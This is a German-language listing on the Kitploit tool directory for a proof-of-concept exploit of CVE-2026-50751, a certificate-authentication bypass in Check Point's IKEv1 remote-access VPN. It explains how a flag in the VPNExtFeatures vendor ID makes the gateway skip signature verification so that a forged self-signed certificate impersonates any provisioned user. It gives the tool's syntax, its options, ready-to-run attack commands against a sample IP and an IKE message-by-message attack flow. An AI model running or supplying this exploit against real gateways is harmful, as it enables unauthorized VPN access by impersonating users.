Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-50751 — Umgehung der Zertifikatsauthentifizierung in der Remote-Access-VPN von Check Point (IKEv1). | Kitploit
Tools/GitHubGitHub/ull0a/cve-2026-50751
Exploit-FrameworksSchwachstellenanalyseExploitationNetzwerksicherheitKryptographiePenetrationstestsAuthentifizierungRed TeamingRemote-Access-Tool
GitHubull0a/cve-2026-50751

CVE-2026-50751

Umgehung der Zertifikatsauthentifizierung in der Remote-Access-VPN von Check Point (IKEv1).

1vor 7h 41mNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-50751 — PoC

Bypass der Zertifikatsauthentifizierung im Remote-Access-VPN von Check Point (IKEv1).

Beschreibung

CVE-2026-50751 ist ein Authentifizierungs-Bypass im iked-Daemon von Check Point, der in den Versionen R81.10, R82 und R82.10 ohne den Hotfix sk185033 vorhanden ist. Der Fehler ermöglicht es, sich als beliebiger provisionierter Remote-Access-Benutzer zu authentifizieren – ohne privaten Schlüssel, ohne Passwort und ohne gültiges Zertifikat.

Das verwundbare iked liest ein Flag aus der Vendor ID VPNExtFeatures (Bit 0x4) und überspringt, wenn es aktiviert ist, verify_peer_auth / verifyMessagePhase1. Daraus folgt:

Die Signatur des Zertifikats wird nicht überprüft (Nachweis des Besitzes).

Die Vertrauenskette wird nicht überprüft.

Es wird nur geprüft, ob der Subject DN zu einem provisionierten Benutzer aufgelöst werden kann.

Es genügt, ein selbstsigniertes Zertifikat zu fälschen, dessen CN= mit dem Zielbenutzer übereinstimmt, und es mit einer ungültigen Signatur zu senden. Wenn das Gateway Phase 1 akzeptiert, sind wir als dieser Benutzer authentifiziert (die ISAKMP-SA wird unter seinem DN gespeichert).

Es funktioniert über IKE (UDP 500/4500) und über Visitor Mode (TCPT, TCP 443).

Verwendung

Syntax

root@kitploit:~
cve-2026-50751 -host <IP|hostname> -user <username> [opciones]

Optionen

FlagBeschreibungStandard
-hostIP oder Hostname des Gateways (erforderlich)—
-userRA-Benutzername, der imitiert werden soll (erforderlich)—
-portPort: 500, 4500 (UDP) oder 443 (TCPT)500
-orgOrganisation (O=) der ICA. Wenn weggelassen, wird sie aus dem TLS-Zertifikat abgeleitet—
-ouOrganisationseinheit (OU=) des Benutzersusers
-timeoutTimeout pro Operation6s
-retriesWiederholungen von msg11
-vAusführliche Ausgabefalse

Beispiele

Einfacher Angriff über UDP/500

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v

Visitor Mode TCPT/443

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v

Organisation erzwingen, anstatt sie abzuleiten

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v

Über NAT-T (UDP/4500)

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v

Ablauf des Angriffs

root@kitploit:~
Angreifer                                            Gateway (verwundbares iked)
   │                                                          │
   │─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (Bit 0x4) ───▶│
   │                                                          │  Liest Flag 0x4
   │                                                          │  Setzt verify_peer_auth = skip
   │◀── msg2: SA akzeptiert ──────────────────────────────────│
   │                                                          │
   │─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
   │◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
   │                                                          │
   │  Leitet SKEYID, SKEYID_e, IV ab                          │
   │                                                          │
   │─── msg5 (verschlüsselt): ID=gefälschter DN + selbst-    │
   │                    signiertes CERT + Zufallssignatur ───▶│
   │                                                          │  Überspringt Signatur-
   │                                                          │  prüfung
   │                                                          │  Löst DN → Benutzer auf
   │◀── msg6 (verschlüsselt): SA hergestellt ─────────────────│
   │                                                          │
   │  Entschlüsselt msg6 mit SKEYID_e → Authentifizierungs-   │
   │  nachweis                                                │

Tool herunterladen